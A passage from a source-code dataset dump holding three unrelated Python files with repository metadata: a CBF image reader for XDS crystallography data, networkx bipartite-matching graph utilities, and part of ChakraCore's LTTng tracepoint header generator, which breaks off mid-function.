] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | #!/usr/bin/env libtbx.python
#
# iotbx.xds.xds_cbf.py
#
# James Parkhurst, Diamond Light Source, 2012/OCT/16
#
# Class to read the CBF files used in XDS
#
from __future__ import absolute_import, division, print_function
class reader:
  """A class to read the CBF files used in XDS"""
  def __init__(self):
    pass
  def read_file(self, filename):
    """Read the CBF file and position the handle at the first datablock."""
    import pycbf
    self.cbf_handle = pycbf.cbf_handle_struct()
    self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST)
    self.cbf_handle.rewind_datablock()
  def get_data(self):
    """Return the image data from the file as a 2D numpy int32 array."""
    import numpy
    # Select the first datablock and rewind all the categories
    self.cbf_handle.select_datablock(0)
    self.cbf_handle.select_category(0)
    self.cbf_handle.select_column(2)
    self.cbf_handle.select_row(0)
    # Check the type of the element to ensure it's a binary, otherwise
    # raise an exception.  (Renamed from "type" so the builtin is not shadowed.)
    value_type = self.cbf_handle.get_typeofvalue()
    if value_type.find('bnry') > -1:
      # Read the image data into an array.  numpy.frombuffer replaces the
      # deprecated numpy.fromstring; copy() restores the writable-array
      # semantics fromstring provided, since frombuffer returns a read-only view.
      image_string = self.cbf_handle.get_integerarray_as_string()
      image = numpy.frombuffer(image_string, numpy.int32).copy()
      # Get the array parameters (slow axis, fast axis dimensions)
      parameters = self.cbf_handle.get_integerarrayparameters_wdims()
      image_size = (parameters[10], parameters[9])
      # Resize the image
      image.shape = image_size
    else:
      raise TypeError('Can\'t find image')
    # Return the image
    return image
if __name__ == '__main__':
  import sys
  # Read the CBF file named on the command line and decode its image data.
  # (The unused "import numpy" was removed; reader imports it internally.)
  handle = reader()
  handle.read_file(sys.argv[1])
  image = handle.get_data()
| 26.803279 | 69 | 0.692355 | 1,263 | 0.772477 | 0 | 0 | 0 | 0 | 0 | 0 | 534 | 0.326606 |
17d6e153039df485af98e9c048abf9aa413e954d | 6,267 | py | Python | py_bipartite_matching/graphs_utils.py | FranciscoMoretti/PyBipartiteMatching | 1edc1b2867c0c2d221fb1deedd1a28ad905b674e | [
"MIT"
] | 1 | 2022-02-24T18:30:48.000Z | 2022-02-24T18:30:48.000Z | py_bipartite_matching/graphs_utils.py | FranciscoMoretti/PyBipartiteMatching | 1edc1b2867c0c2d221fb1deedd1a28ad905b674e | [
"MIT"
] | 1 | 2021-02-14T15:16:17.000Z | 2021-02-14T15:23:49.000Z | py_bipartite_matching/graphs_utils.py | FranciscoMoretti/py_bipartite_matching | 1edc1b2867c0c2d221fb1deedd1a28ad905b674e | [
"MIT"
] | null | null | null | # utils for graphs of the networkx library
import copy
import networkx as nx
from networkx.algorithms.shortest_paths import shortest_path
from typing import Any, Union, Optional, Iterator, Iterable, Tuple, Dict, List, cast
LEFT = 0
RIGHT = 1
def top_nodes(graph: nx.Graph,
              data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
    """Yield the nodes of the top partition (``bipartite == 0``).

    When ``data`` is true, ``(node, attribute_dict)`` pairs are yielded
    instead of bare node ids.
    """
    for node, attributes in graph.nodes(data=True):
        if attributes['bipartite'] != 0:
            continue
        yield (node, attributes) if data else node
def bottom_nodes(graph: nx.Graph,
                 data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
    """Yield the nodes of the bottom partition (``bipartite == 1``).

    When ``data`` is true, ``(node, attribute_dict)`` pairs are yielded
    instead of bare node ids.
    """
    for node, attributes in graph.nodes(data=True):
        if attributes['bipartite'] != 1:
            continue
        yield (node, attributes) if data else node
def bipartite_node_positions(graph: nx.Graph) -> Dict[int, Tuple[int, int]]:
    """Assign drawing coordinates: top nodes in a column at x=1, bottom at x=2."""
    positions: Dict[int, Tuple[int, int]] = {}
    for row, node in enumerate(top_nodes(graph)):
        positions[node] = (1, row)  # nodes from X at x=1
    for row, node in enumerate(bottom_nodes(graph)):
        positions[node] = (2, row)  # nodes from Y at x=2
    return positions
def draw_bipartite(graph: nx.Graph) -> None:
    """Draw the whole graph in a two-column bipartite layout with bold labels."""
    layout = bipartite_node_positions(graph)
    nx.draw(graph, pos=layout, with_labels=True, font_weight='bold')
def draw_nodes(graph: nx.Graph, labels: bool = False) -> None:
    """Draw the nodes; use each node's 'label' attribute when ``labels`` is true."""
    layout = bipartite_node_positions(graph)
    nx.draw_networkx_nodes(graph, pos=layout, node_size=300)
    if not labels:
        # Default labelling: the node ids themselves.
        nx.draw_networkx_labels(graph, pos=layout)
        return
    # Custom labelling: left-align the top partition, right-align the bottom one.
    top_text = {node: str(attrs['label']) for node, attrs in top_nodes(graph, data=True)}
    nx.draw_networkx_labels(graph, pos=layout, labels=top_text, horizontalalignment='left')
    bottom_text = {node: str(attrs['label']) for node, attrs in bottom_nodes(graph, data=True)}
    nx.draw_networkx_labels(graph,
                            pos=layout,
                            labels=bottom_text,
                            horizontalalignment='right')
def draw_edges(graph: nx.Graph, edge_list: Optional[Iterable[Tuple[Any, Any]]] = None) -> None:
    """Draw the given edges (all edges when ``edge_list`` is None)."""
    layout = bipartite_node_positions(graph)
    nx.draw_networkx_edges(graph, pos=layout, edgelist=edge_list)
def draw_matching(graph: nx.Graph, matching: Dict[Any, Any], labels: bool = False) -> None:
    """Draw all nodes but only the edges that belong to ``matching``."""
    matched_edges = matching.items()
    draw_nodes(graph, labels=labels)
    draw_edges(graph, matched_edges)
def find_cycle_with_edge_of_matching(graph: nx.Graph, matching: Dict[Any, Any]) -> List[Any]:
    """Return a node path forming a cycle that uses at least one matching edge.

    For each matching edge (u, v) the edge is removed from a scratch copy of
    the graph; if v and u are still connected, the remaining path plus the
    removed edge closes a cycle.  Raises ``nx.NetworkXNoCycle`` when no
    matching edge lies on any cycle.
    """
    scratch = copy.deepcopy(graph)
    for left, right in matching.items():
        # The graph could have been reduced; skip matching edges it no longer has.
        if not scratch.has_edge(left, right):
            continue
        scratch.remove_edge(left, right)
        try:
            cycle_path = shortest_path(G=scratch, source=right, target=left)
        except nx.NetworkXNoPath:
            scratch.add_edge(left, right)
            continue
        else:
            scratch.add_edge(left, right)
            return cast(List[Any], cycle_path)
    # No cycle was found through any matching edge.
    raise nx.NetworkXNoCycle
def find_feasible_two_edge_path(graph: nx.Graph,
                                matching: Dict[Any, Any]) -> Optional[Tuple[Any, Any, Any]]:
    """Find a two-edge path whose middle edge belongs to the matching.

    The path has the form top1 -> bottom -> top2 or bottom1 -> top -> bottom2:
    the first two nodes are a matched (top, bottom) pair and the third is a
    neighbor that is not covered by the matching.  Returns None if no such
    path exists.
    """
    # Hoist the partition and matching membership tests out of the loops:
    # the original rebuilt the node generators and matching.values() view on
    # every iteration, making each membership test O(n).
    tops = set(top_nodes(graph))
    bottoms = set(bottom_nodes(graph))
    matched_bottoms = set(matching.values())
    for top, bottom in matching.items():
        if top in tops and bottom in bottoms:
            for new_bottom in graph.neighbors(top):
                if new_bottom not in matched_bottoms:
                    return (bottom, top, new_bottom)
            for new_top in graph.neighbors(bottom):
                if new_top not in matching:
                    return (top, bottom, new_top)
    return None
def strongly_connected_components_decomposition(graph: nx.DiGraph) -> nx.DiGraph:
    """Remove every edge that links two different strongly connected
    components, keeping only intra-component edges.

    Mutates ``graph`` in place and returns the same object.
    """
    # NOTE(review): scc is a lazy generator consumed while edges are being
    # removed; only inter-component edges are deleted, which should not change
    # component membership — confirm against networkx's generator semantics.
    scc = nx.strongly_connected_components(graph)
    for cc in scc:
        for node in cc:
            # Collect first, then remove: deleting while iterating
            # graph.adj[node] would invalidate the adjacency iterator.
            to_remove = set()
            for neighbor in graph.adj[node]:
                if neighbor not in cc:
                    to_remove.add(neighbor)
            for neighbor in to_remove:
                graph.remove_edge(node, neighbor)
    return graph
def create_directed_matching_graph(graph: nx.Graph, top_nodes: Iterable[Any],
                                   matching: Dict[Any, Any]) -> nx.DiGraph:
    """Orient the bipartite graph by the matching: matched edges keep the
    top->bottom direction, unmatched edges keep bottom->top.

    Note: the ``top_nodes`` parameter shadows the module-level ``top_nodes``
    function; callers pass an iterable of top-partition nodes here.
    """
    # creates a directed copy of the graph with all edges on both directions
    directed_graph = graph.to_directed()
    for top_node in top_nodes:
        for bottom_node in graph.adj[top_node]:
            if top_node in matching.keys() and bottom_node == matching[top_node]:
                # Matched edge: drop the bottom->top arc, keep top->bottom.
                directed_graph.remove_edge(bottom_node, top_node)
            else:
                # Unmatched edge: drop top->bottom, keep bottom->top.
                directed_graph.remove_edge(top_node, bottom_node)
    # check for duplicated (should not exist any)
    ordered_edges = [tuple(sorted(e)) for e in directed_graph.edges]
    assert len(ordered_edges) == len(set(ordered_edges))
    # Exactly one arc survives per undirected edge; nodes are untouched.
    assert len(graph.edges) == len(directed_graph.edges)
    assert len(graph.nodes) == len(directed_graph.nodes)
    return directed_graph
def graph_without_nodes_of_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
    """Returns a copy of this bipartite graph with the given edge and its adjacent nodes removed."""
    reduced = nx.Graph(graph)
    for endpoint in edge:
        reduced.remove_node(endpoint)
    # Sanity checks: a distinct graph with exactly two fewer nodes.
    assert reduced != graph
    assert len(reduced.nodes) == len(graph.nodes) - 2
    return reduced
def graph_without_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
    """Returns a copy of this bipartite graph with the given edge removed."""
    reduced = nx.Graph(graph)
    reduced.remove_edge(edge[0], edge[1])
    # Sanity checks: exactly one edge fewer, node set untouched.
    assert len(reduced.edges) == len(graph.edges) - 1
    assert len(reduced.nodes) == len(graph.nodes)
    return reduced
17d70d0f739b0dba8004b1173a78f20e8da6da67 | 29,476 | py | Python | tools/lttng.py | Taritsyn/ChakraCore | b6042191545a823fcf9d53df2b09d160d5808f51 | [
"MIT"
] | 8,664 | 2016-01-13T17:33:19.000Z | 2019-05-06T19:55:36.000Z | tools/lttng.py | Taritsyn/ChakraCore | b6042191545a823fcf9d53df2b09d160d5808f51 | [
"MIT"
] | 5,058 | 2016-01-13T17:57:02.000Z | 2019-05-04T15:41:54.000Z | tools/lttng.py | Taritsyn/ChakraCore | b6042191545a823fcf9d53df2b09d160d5808f51 | [
"MIT"
] | 1,367 | 2016-01-13T17:54:57.000Z | 2019-04-29T18:16:27.000Z | #-------------------------------------------------------------------------------------------------------
# Copyright (C) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
#-------------------------------------------------------------------------------------------------------
import xml.dom.minidom as DOM
# Maps ETW manifest ("win:*") types to the C argument types used in the
# generated LTTng TP_ARGS lists.  "win:count" maps to "*" because counted
# parameters are passed by pointer.
# NOTE(review): "win:HexInt64" exists in ctfDataTypeMapping below but not
# here or in palDataTypeMapping — a template using it would raise KeyError;
# confirm no manifest uses it.
lttngDataTypeMapping = {
        "win:null" :" ",
        "win:Int64" :"const __int64",
        "win:ULong" :"const unsigned long",
        "win:count" :"*",
        "win:Struct" :"const char *",
        "win:GUID" :"const int",
        "win:AnsiString" :"const char*",
        "win:UnicodeString" :"const char*",
        "win:Double" :"const double",
        "win:Int32" :"const signed int",
        "win:HexInt32" :"const signed int",
        "win:Boolean" :"const bool",
        "win:UInt64" :"const unsigned __int64",
        "win:UInt32" :"const unsigned int",
        "win:UInt16" :"const unsigned short",
        "win:UInt8" :"const unsigned char",
        "win:Int8" :"const char",
        "win:Pointer" :"const uintptr_t",
        "win:Binary" :"const char"
        }
# Maps ETW manifest types to the LTTng CTF field macros (ctf_integer,
# ctf_string, ctf_sequence, ...) used when generating TP_FIELDS bodies.
ctfDataTypeMapping = {
        "win:Int64" :"ctf_integer",
        "win:HexInt64" :"ctf_integer_hex",
        "win:ULong" :"ctf_integer",
        "win:count" :"ctf_sequence",
        "win:Struct" :"ctf_sequence",
        "win:GUID" :"ctf_sequence",
        "win:AnsiString" :"ctf_string",
        "win:UnicodeString" :"ctf_string",
        "win:Double" :"ctf_float",
        "win:Int32" :"ctf_integer",
        "win:HexInt32" :"ctf_integer_hex",
        "win:Boolean" :"ctf_integer",
        "win:UInt64" :"ctf_integer",
        "win:UInt32" :"ctf_integer",
        "win:UInt16" :"ctf_integer",
        "win:HexInt16" :"ctf_integer_hex",
        "win:UInt8" :"ctf_integer", #actually a character
        "win:Int8" :"ctf_integer", #actually a character
        "win:Pointer" :"ctf_integer",
        "win:Binary" :"ctf_sequence",
        "xs:string" :"ctf_string",
        "xs:unsignedLong" :"ctf_integer",
        "xs:unsignedInt" :"ctf_integer"
        }
# Maps ETW manifest types to the PAL-facing C types used in the public
# FireEtXplat*/EventWrite* method signatures.
palDataTypeMapping ={
        "win:null" :" ",
        "win:Int64" :"const __int64",
        "win:ULong" :"const unsigned long",
        "win:count" :"*",
        "win:Struct" :"const void",
        "win:GUID" :"const GUID",
        "win:AnsiString" :"LPCSTR",
        "win:UnicodeString" :"PCWSTR",
        "win:Double" :"const double",
        "win:Int32" :"const signed int",
        "win:HexInt32" :"const signed int",
        "win:Boolean" :"const bool",
        "win:UInt64" :"const unsigned __int64",
        "win:UInt32" :"const unsigned int",
        "win:UInt16" :"const unsigned short",
        "win:UInt8" :"const unsigned char",
        "win:Int8" :"const char",
        "win:Pointer" :"const void*",
        "win:Binary" :"const char"
        }
# Events with more parameters than this are "packed": serialized into a
# single length-prefixed byte blob instead of discrete tracepoint arguments.
MAX_LTTNG_ARGS = 10
def getParamSequenceSize(paramSequence, estimate):
    """Compute the packed byte size of a sequence of ETW ("win:*") types.

    When ``estimate`` is true, a single int is returned and variable-size
    types (strings, structs, pointers) are charged a fixed guess; otherwise
    a ``(fixed_bytes, pointer_count)`` tuple is returned and unknown
    variable-size types contribute nothing.

    Fix: the original tested the misspellings "win:Uint8" and bare "GUID",
    which never match the "win:UInt8"/"win:GUID" spellings used by the
    manifests and the mapping tables above, so those types wrongly raised
    "Don't know size of" under estimation.  Both spellings are accepted now.
    """
    total = 0
    pointers = 0
    for param in paramSequence:
        if param in ["win:Int64", "win:UInt64", "win:Double"]:
            total += 8
        elif param in ["win:ULong", "win:Int32", "win:Boolean"]:
            total += 4
        elif param in ["win:GUID", "GUID"]:
            total += 16
        elif param in ["win:UInt16"]:
            total += 2
        elif param in ["win:UInt8", "win:Uint8", "win:Binary"]:
            total += 1
        elif param == "win:Pointer":
            if estimate:
                total += 8
            else:
                pointers += 1
        elif estimate:
            if param in ["win:AnsiString", "win:Struct"]:
                total += 32
            elif param in ["win:UnicodeString"]:
                total += 64
            else:
                raise Exception("Don't know size of " + param)
    if estimate:
        return total
    return total, pointers
class Template:
    """In-memory form of one manifest <template>: the ordered,
    dependency-closed parameter list for an event plus struct/array count
    metadata used by the code generators."""
    def __repr__(self):
        return "<Template " + self.name + " />"
    def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts):
        # prototypes: FunctionSignature holding every <data>/<struct> parameter.
        # dependencies: variable -> ordered list of variables that must appear
        # before it (e.g. a count parameter precedes the array it sizes).
        self.name = name
        self.signature = FunctionSignature()
        self.structCounts = structCounts
        self.arrayCounts = arrayCounts
        for variable in prototypes.paramList:
            for dependency in dependencies[variable]:
                # Keep first occurrence only so each parameter appears once.
                if not self.signature.getParam(dependency):
                    self.signature.append(dependency, prototypes.getParam(dependency))
    @property
    def num_params(self):
        # Number of parameters in the generated tracepoint signature.
        return len(self.signature.paramList)
    def getParam(self, name):
        return self.signature.getParam(name)
    @property
    def estimatedSize(self):
        # Rough payload size in bytes, clamped to [32, 1024]; used to size the
        # stack buffer when the event's arguments are packed into a byte blob.
        total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True)
        if total < 32:
            return 32
        elif total > 1024:
            return 1024
        return total
class FunctionSignature:
    """Ordered mapping from parameter name to its FunctionParameter."""

    def __init__(self):
        # Insertion order is significant: it is the generated argument order.
        self.LUT = {}
        self.paramList = []

    def __repr__(self):
        return ', '.join(self.paramList)

    def append(self, variable, param):
        self.paramList.append(variable)
        self.LUT[variable] = param

    def getParam(self, variable):
        if variable in self.LUT:
            return self.LUT[variable]
        return None

    def getLength(self):
        return len(self.paramList)
class FunctionParameter:
    """One event parameter as declared by a manifest <data>/<struct> node."""

    def __init__(self, winType, name, count, outType, length):
        self.name = name
        self.winType = winType
        self.outType = outType
        self.length = length
        # GUIDs are always emitted as fixed-size sequences, so they are
        # normalized to counted parameters just like explicit arrays.
        is_counted = (winType == "win:GUID") or (count == "win:count")
        self.count = "win:count" if is_counted else "win:null"

    def __repr__(self):
        return self.name
# XML attributes on <data> nodes that are recognized but deliberately unused.
ignoredXmlAttributes = frozenset(["map"])
# XML attributes that actually drive code generation.
usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"])
# Any attribute outside this union aborts parsing (see checkKnownAttributes).
knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes
def checkKnownAttributes(nodes, templateName):
    """Raise ValueError if any node carries an XML attribute we do not know."""
    for node in nodes:
        for attribute in node.attributes.values():
            if attribute.name in knownXmlAttributes:
                continue
            raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName)
def getTopLevelElementsByTagName(node, tag):
    """Like getElementsByTagName, but restricted to direct children of ``node``."""
    descendants = node.getElementsByTagName(tag)
    return [child for child in descendants if child.parentNode == node]
def parseTemplateNodes(templateNodes):
    """Parse manifest <template> DOM nodes into a dict of Template objects
    keyed by template id ('tid')."""
    templates = {}
    for templateNode in templateNodes:
        templateName = templateNode.getAttribute('tid')
        dataNodes = getTopLevelElementsByTagName(templateNode, 'data')
        # Fail fast on attributes the generator does not understand.
        checkKnownAttributes(dataNodes, templateName)
        functionPrototypes = FunctionSignature()
        arrayCounts = {}
        structCounts = {}
        var_Dependencies = {}
        for dataNode in dataNodes:
            variable = dataNode.getAttribute('name')
            wintype = dataNode.getAttribute('inType')
            outType = dataNode.getAttribute('outType')
            wincount = dataNode.getAttribute('count')
            winLength = dataNode.getAttribute('length')
            var_dependency = [variable]
            if winLength:
                if wincount:
                    raise Exception("Both count and length properties found on " + variable + " in template " + templateName)
            # A constant count of 1 is the same as no count at all.
            if wincount.isdigit() and int(wincount) == 1:
                wincount = ''
            if wincount:
                if wincount.isdigit():
                    raise Exception("Expect constant count to be length")
                elif functionPrototypes.getParam(wincount):
                    # The count is another parameter: it must precede this one.
                    # NOTE(review): a count naming a not-yet-seen parameter is
                    # silently ignored here — confirm manifests always declare
                    # counts before the arrays they size.
                    var_dependency.insert(0, wincount)
                    arrayCounts[variable] = wincount
            var_Dependencies[variable] = var_dependency
            functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength)
            functionPrototypes.append(variable, functionParameter)
        # <struct> members become opaque counted byte sequences.
        structNodes = getTopLevelElementsByTagName(templateNode, 'struct')
        for structNode in structNodes:
            structName = structNode.getAttribute('name')
            countName = structNode.getAttribute('count')
            assert(countName in functionPrototypes.paramList)
            #childData = structNode.getElementsByTagName("data")
            #names = [x.attributes['name'].value for x in childData]
            #types = [x.attributes['inType'].value for x in childData]
            structCounts[structName] = countName
            var_Dependencies[structName] = [countName, structName]
            functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None)
            functionPrototypes.append(structName, functionParameterPointer)
        templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts)
    return templates
def shouldPackTemplate(template):
    """True when the event payload must be serialized into a single byte blob:
    either too many arguments for LTTng, or variable-size struct/array data."""
    too_many_args = template.num_params > MAX_LTTNG_ARGS
    has_variable_data = bool(template.structCounts) or bool(template.arrayCounts)
    return too_many_args or has_variable_data
def generateArgList(template):
    """Build the TP_ARGS(...) macro body for a template.

    Packed templates take a (length, byte-blob) pair; otherwise each
    parameter becomes one "type, name" entry.
    """
    # Construct a TP_ARGS macro call, as defined in another macro, e.g.
    #
    # TP_ARGS( \
    #     int, my_integer_arg, \
    #     char*, my_string_arg \
    # )
    header = "TP_ARGS( \\\n"
    footer = "\\\n)"
    args = []
    if shouldPackTemplate(template):
        args.append("        const unsigned int, length")
        args.append("        const char *, __data__")
    else:
        signature = template.signature
        for param in signature.paramList:
            functionParam = signature.getParam(param)
            wintypeName = functionParam.winType
            mappedType = lttngDataTypeMapping[wintypeName]
            winCount = functionParam.count
            mappedCount = lttngDataTypeMapping[winCount]
            arg = "        " + mappedType
            # Counted parameters ("*") and length-qualified ones are pointers.
            if mappedCount != " ":
                arg += mappedCount
            elif functionParam.length:
                arg += "*"
            arg += ", " + functionParam.name
            args.append(arg)
    return header + ", \\\n".join(args) + footer
def generateFieldList(template):
    """Build the TP_FIELDS(...) macro body for a template.

    Packed templates serialize into a single length-prefixed byte blob;
    otherwise each parameter becomes one ctf_* field.

    Fix: the struct/array branch read the nonexistent attribute
    ``functionParam.prop`` while the correct count variable, ``countVar``,
    was computed on the previous line and then ignored (AttributeError if
    that branch ever ran).  The unused ``mappedCount`` local was removed.
    """
    # Construct a TP_FIELDS macro call, e.g.
    # TP_FIELDS(
    #     ctf_string(my_string_field, my_string_arg)
    #     ctf_integer(int, my_integer_field, my_integer_arg)
    # )
    header = "    " + " TP_FIELDS(\n"
    footer = "\n    )"
    fieldList = []
    if shouldPackTemplate(template):
        fieldList.append("        ctf_integer(unsigned long, length, length)")
        fieldList.append("        ctf_sequence(char, __data__, __data__, unsigned long, length)")
    else:
        signature = template.signature
        for param in signature.paramList:
            functionParam = signature.getParam(param)
            wintypeName = functionParam.winType
            mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "")
            # outType, when present, overrides the CTF representation.
            if functionParam.outType:
                wintypeName = functionParam.outType
            varname = functionParam.name
            if param in template.structCounts or param in template.arrayCounts:
                # This is a struct or array: a sequence sized by its count parameter.
                countVar = template.structCounts.get(param, template.arrayCounts.get(param))
                ctf_type = "ctf_sequence"
                field_body = ", ".join((mappedType, varname, varname, "size_t", countVar))
            elif functionParam.length:
                ctf_type = "ctf_sequence"
                field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length))
            else:
                ctf_type = ctfDataTypeMapping[wintypeName]
                if ctf_type == "ctf_string":
                    field_body = ", ".join((varname, varname))
                elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float":
                    field_body = ", ".join((mappedType, varname, varname))
                elif ctf_type == "ctf_sequence":
                    raise Exception("ctf_sequence needs special handling: " + template.name + " " + param)
                else:
                    raise Exception("Unhandled ctf intrinsic: " + ctf_type)
            fieldList.append("        %s(%s)" % (ctf_type, field_body))
    return header + "\n".join(fieldList) + footer
def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events):
    """Generate the LTTng tracepoint header (tp<provider>.h): one event class
    per template, an empty-template class, and one event instance per event.

    Fixes: removed the unused local ``functionSignature``; the missing-symbol
    error used to concatenate a DOM Element with a string (TypeError masking
    the intended message) — it now serializes the node first.
    """
    headerLines = []
    headerLines.append("")
    # __int64 is a Windows-ism; it is #defined away on 64-bit POSIX builds.
    headerLines.append("#ifdef __int64")
    headerLines.append("#if TARGET_64")
    headerLines.append("#undef __int64")
    headerLines.append("#else")
    headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")
    headerLines.append("#endif // TARGET_64")
    headerLines.append("#endif // __int64")
    headerLines.append("#undef TRACEPOINT_PROVIDER")
    headerLines.append("#undef TRACEPOINT_INCLUDE")
    headerLines.append("")
    headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n")
    headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n")
    headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")
    headerLines.append("#define LTTNG_CHAKRA_H" + providerName +"\n")
    headerLines.append("\n#include <lttng/tracepoint.h>\n\n")
    # One TRACEPOINT_EVENT_CLASS plus an instance-declaring macro per template.
    for templateName in templates:
        template = templates[templateName]
        headerLines.append("")
        headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\")
        tracepointArgs = generateArgList(template)
        headerLines.append(tracepointArgs)
        headerLines.append("TRACEPOINT_EVENT_CLASS(")
        headerLines.append("    " + providerName + ",")
        headerLines.append("    " + templateName + ",")
        headerLines.append("    " + templateName + "_TRACEPOINT_ARGS,")
        tracepointFields = generateFieldList(template)
        headerLines.append(tracepointFields)
        headerLines.append(")")
        headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\")
        headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
        headerLines.append("    " + providerName + ",\\")
        headerLines.append("    " + templateName + ",\\")
        headerLines.append("    name,\\")
        headerLines.append("    " + templateName + "_TRACEPOINT_ARGS \\")
        headerLines.append(")")
    # Catch-all class for events that have no template (no payload).
    headerLines.append("")
    headerLines.append("")
    headerLines.append("TRACEPOINT_EVENT_CLASS(")
    headerLines.append("    " + providerName + ",")
    headerLines.append("    emptyTemplate,")
    headerLines.append("    TP_ARGS(),")
    headerLines.append("    TP_FIELDS()")
    headerLines.append(")")
    headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")
    headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
    headerLines.append("    " + providerName + ",\\")
    headerLines.append("    emptyTemplate,\\")
    headerLines.append("    name,\\")
    headerLines.append("    TP_ARGS()\\")
    headerLines.append(")")
    headerLines.append("")
    for eventNode in events:
        eventName = eventNode.getAttribute('symbol')
        templateName = eventNode.getAttribute('template')
        if not eventName:
            raise Exception(eventNode.toxml() + " event does not have a symbol")
        if not templateName:
            headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")")
            continue
        headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")")
    headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */")
    headerLines.append("#include <lttng/tracepoint-event.h>")
    return "\n".join(headerLines)
def generateMethodBody(template, providerName, eventName):
    """Generate the C++ body of a FireEtXplat* function for one event.

    Non-packed events call do_tracepoint() with each argument directly
    (converting wide strings to UTF-8 and casting pointers); packed events
    serialize all arguments into a byte buffer first.

    Fix: the count-based CTF lookup assigned to a misspelled ``ctf_Type``
    (capital T), silently discarding the result; corrected to ``ctf_type``.
    """
    # Convert from ETW's windows types to LTTng compatiable types
    methodBody = [""]
    functionSignature = template.signature
    if not shouldPackTemplate(template):
        invocation = ["do_tracepoint(" + providerName, eventName]
        for paramName in functionSignature.paramList:
            functionParam = functionSignature.getParam(paramName)
            wintypeName = functionParam.winType
            winCount = functionParam.count
            ctf_type = None
            if functionParam.outType:
                ctf_type = ctfDataTypeMapping.get(functionParam.outType)
            else:
                # Was "ctf_Type = ..." — a typo that dropped the lookup result.
                ctf_type = ctfDataTypeMapping.get(winCount)
            if not ctf_type:
                ctf_type = ctfDataTypeMapping[wintypeName]
            if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString":
                # Convert wchar unicode string to utf8
                if functionParam.length:
                    methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");")
                else:
                    methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");")
                invocation.append(paramName + "_converter")
            elif wintypeName == "win:Pointer":
                # Cast to the exact declared tracepoint argument type.
                invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName)
            else:
                invocation.append(paramName)
        methodBody.append(",\n        ".join(invocation) + ");")
    else:
        # Packing results into buffer
        methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];")
        methodBody.append("char *buffer = stackBuffer;")
        methodBody.append("int offset = 0;")
        methodBody.append("int size = " + str(template.estimatedSize) + ";")
        methodBody.append("bool fixedBuffer = true;")
        methodBody.append("bool success = true;")
        for paramName in functionSignature.paramList:
            functionParameter = functionSignature.getParam(paramName)
            if paramName in template.structCounts:
                # Struct blobs: element size is passed in by the caller.
                size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName]
                methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
            elif paramName in template.arrayCounts:
                size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName]
                methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
            elif functionParameter.winType == "win:GUID":
                # GUIDs arrive by pointer; write the pointee by value.
                methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);")
            else:
                methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);")
        methodBody.append("if (!success)")
        methodBody.append("{")
        methodBody.append("    if (!fixedBuffer) delete[] buffer;")
        methodBody.append("    return ERROR_WRITE_FAULT;")
        methodBody.append("}")
        methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);")
        methodBody.append("if (!fixedBuffer) delete[] buffer;")
    return "\n    ".join(methodBody) + "\n"
def generateMethodSignature(template):
    """Generate the C parameter list for a FireEtXplat*/EventWrite* function.

    Returns an empty string for template-less (payload-free) events.  Struct
    parameters gain an extra leading ``int <name>_ElementSize`` argument.
    """
    if not template:
        return ""
    functionSignature = template.signature
    lineFunctionPrototype = []
    for paramName in functionSignature.paramList:
        functionParameter = functionSignature.getParam(paramName)
        wintypeName = functionParameter.winType
